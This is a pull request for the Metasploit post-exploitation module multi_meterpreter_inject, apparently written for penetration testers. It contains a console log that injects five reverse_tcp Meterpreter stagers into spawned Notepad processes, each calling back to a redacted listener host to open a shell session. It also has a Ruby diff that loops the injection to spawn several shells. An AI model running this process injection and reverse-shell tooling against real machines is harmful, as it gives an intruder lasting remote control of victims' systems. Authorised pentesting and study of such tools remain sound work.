Added ability to generate multiple payloads - not just one

Ran into a pentest recently where I had a flaky meterpreter shell, had it launch multiple ones just to be safe. The amount datastore allows you to iterate through and spawn multiple sessions.

msf exploit(psexec) > use post/windows/manage/multi_meterpreter_inject 
msf post(multi_meterpreter_inject) > show options

Module options (post/windows/manage/multi_meterpreter_inject):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   AMOUNT   1                                no        Select the amount of shells you want to spawn.
   HANDLER  false                            no        Start new multi/handler job on local box.
   IPLIST   XXXXXXXXX                        yes       List of semicolom separated IP list.
   LPORT    4444                             no        Port number for the payload LPORT variable.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        Payload to inject in to process memory
   PIDLIST                                   no        List of semicolom separated PID list.
   SESSION                                   yes       The session to run this module on.

msf post(multi_meterpreter_inject) > set AMOUNT 5
AMOUNT => 5
msf post(multi_meterpreter_inject) > set HANDLER true
HANDLER => true
msf post(multi_meterpreter_inject) > set SESSION 1
SESSION => 1
msf post(multi_meterpreter_inject) > exploit

[*] Running module against XXXXXXXXX
[*] Starting connection handler at port 4444 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 5400
[*] Injecting meterpreter into process ID 5400
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 5400
[*] Meterpreter session 2 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4991) at 2013-10-09 18:04:02 -0400

[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 4136
[*] Injecting meterpreter into process ID 4136
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 4136
[*] Meterpreter session 3 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4992) at 2013-10-09 18:04:08 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 4108
[*] Injecting meterpreter into process ID 4108
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 4108
[*] Meterpreter session 4 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4993) at 2013-10-09 18:04:13 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 5788
[*] Injecting meterpreter into process ID 5788
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 5788
[*] Meterpreter session 5 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4994) at 2013-10-09 18:04:19 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 1408
[*] Injecting meterpreter into process ID 1408
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 1408
[*] Meterpreter session 6 opened (XXXXXXXXX:4444 -> XXXXXXXXX:1029) at 2013-10-09 18:04:24 -0400
[*] Post module execution completed
msf post(multi_meterpreter_inject) >

modules/post/windows/manage/multi_meterpreter_inject.rb

@@ -14,14 +14,16 @@ class Metasploit3 < Msf::Post
   def initialize(info={})
     super( update_info( info,
       'Name'          => 'Windows Manage Inject in Memory Multiple Payloads',
-      'Description'   => %q{ This module will inject in to several process a given
+      'Description'   => %q{ This module will inject in to several processes a given
         payload and connecting to a given list of IP Addresses.
         The module works with a given lists of IP Addresses and
         process PIDs if no PID is given it will start a the given
         process in the advanced options and inject the selected
         payload in to the memory of the created module.},
       'License'       => MSF_LICENSE,
-      'Author'        => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
+      'Author'        => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>',
+                            'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>' # added multiple payload support
+                         ],
       'Platform'      => [ 'win' ],
       'SessionTypes'  => [ 'meterpreter']
     ))
@@ -32,7 +34,8 @@ class Metasploit3 < Msf::Post
         OptInt.new('LPORT',      [false, 'Port number for the payload LPORT variable.', 4444]),
         OptString.new('IPLIST',  [true, 'List of semicolom separated IP list.', Rex::Socket.source_address("1.2.3.4")]),
         OptString.new('PIDLIST', [false, 'List of semicolom separated PID list.', '']),
-        OptBool.new('HANDLER',   [false, 'Start new multi/handler job on local box.', false])
+        OptBool.new('HANDLER',   [false, 'Start new multi/handler job on local box.', false]),
+        OptInt.new('AMOUNT',     [false, 'Select the amount of shells you want to spawn.', 1])
       ], self.class)
 
     register_advanced_options(
@@ -60,19 +63,23 @@ class Metasploit3 < Msf::Post
     multi_ip = datastore['IPLIST'].split(";")
     multi_pid = datastore['PIDLIST'].split(";")
 
-    multi_ip.zip(multi_pid).each do |a|
-      # Check if we have an IP for the session
-      if a[1]
-        payload = create_payload(datastore['PAYLOAD'],a[0],datastore['LPORT'])
-        inject(a[1],payload)
-        select(nil, nil, nil, 5)
-      else
-        # if no PID we create a process to host the Meterpreter session
-        payload = create_payload(datastore['PAYLOAD'],a[0],datastore['LPORT'])
-        pid_num = start_proc(datastore['PROCESSNAME'])
-        inject(pid_num,payload)
-        select(nil, nil, nil, 5)
-      end
+    datastore['AMOUNT'].times do # iterate through number of shells
+
+        multi_ip.zip(multi_pid).each do |a|
+            # Check if we have an IP for the session
+            if a[1]
+                payload = create_payload(datastore['PAYLOAD'],a[0],datastore['LPORT'])
+                inject(a[1],payload)
+                select(nil, nil, nil, 5)
+            else
+                # if no PID we create a process to host the Meterpreter session
+                payload = create_payload(datastore['PAYLOAD'],a[0],datastore['LPORT'])
+                pid_num = start_proc(datastore['PROCESSNAME'])
+                inject(pid_num,payload)
+                select(nil, nil, nil, 5)
+            end
+
+        end
     end
   end